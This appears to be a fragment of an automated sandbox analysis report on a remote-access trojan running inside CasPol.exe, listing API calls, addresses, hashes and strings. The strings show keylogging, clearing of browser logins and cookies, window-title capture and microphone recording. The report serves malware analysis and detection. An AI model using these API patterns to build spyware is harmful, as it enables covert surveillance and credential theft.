• Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
APIs
• TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
• UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
• TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: TerminateThread$HookUnhookWindows
• String ID: pth_unenc
• API String ID: 3123878439-4028850238
• Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
• Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
• Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• GetProcAddress.KERNEL32(00000000), ref: 00401441
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
• Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
• Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
• Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
• GetProcAddress.KERNEL32(00000000), ref: 004014E6
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
• Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
• Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
• Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
APIs
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
• Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
• Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                            • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                            • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                            • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                            • API String ID: 3472027048-1236744412
                                                                                                            • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                            • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                            • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                            • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                                            • String ID: @CG$exepath$BG
                                                                                                            • API String ID: 4119054056-3221201242
                                                                                                            • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                            • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                            • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                            • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                              • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                              • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                                            • String ID: [ $ ]
                                                                                                            • API String ID: 3309952895-93608704
                                                                                                            • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                            • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                            • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                            • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                            • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                            • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                            • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                            • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                            • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                            • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                              • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                              • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                            • String ID:
                                                                                                            • API String ID: 737400349-0
                                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                            • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                            • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                            • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                            • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                            • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                            • String ID:
                                                                                                            • API String ID: 3919263394-0
                                                                                                            • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                            • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                            • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                            • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4116985748-0
                                                                                                            • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                            • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                            • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                            • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                            APIs
                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleOpenProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 39102293-0
                                                                                                            • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                            • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                            • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                            • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                            APIs
                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorHandling__start
                                                                                                            • String ID: pow
                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                            • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                            • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $fD
                                                                                                            • API String ID: 1807457897-3092946448
                                                                                                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                            • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                            • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                            APIs
                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 0-711371036
                                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                            • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                            • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                            Strings
                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                            • API String ID: 481472006-1507639952
                                                                                                            • Opcode ID: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                                                            • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                            • Opcode Fuzzy Hash: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                                                            • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                            • API String ID: 481472006-2430845779
                                                                                                            • Opcode ID: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                                            • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                            • Opcode Fuzzy Hash: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                                            • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                            APIs
                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExistsFilePath
                                                                                                            • String ID: alarm.wav$xIG
                                                                                                            • API String ID: 1174141254-4080756945
                                                                                                            • Opcode ID: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                            • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                            • Opcode Fuzzy Hash: 36f323d8f2bb9e76d772b055fe3e42ba41a64d0aa3630582bee8464c0ac7f47d
                                                                                                            • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                            • String ID: Online Keylogger Stopped
                                                                                                            • API String ID: 1623830855-1496645233
                                                                                                            • Opcode ID: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                                                            • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                            • Opcode Fuzzy Hash: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                                                            • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                            APIs
                                                                                                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                                            • String ID: T=G
                                                                                                            • API String ID: 2315374483-379896819
                                                                                                            • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                            • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                            APIs
                                                                                                            • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocaleValid
                                                                                                            • String ID: IsValidLocaleName$j=D
                                                                                                            • API String ID: 1901932003-3128777819
                                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                            • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                            • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: T=G$T=G
                                                                                                            • API String ID: 3519838083-3732185208
                                                                                                            • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                            • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                            • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                            • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
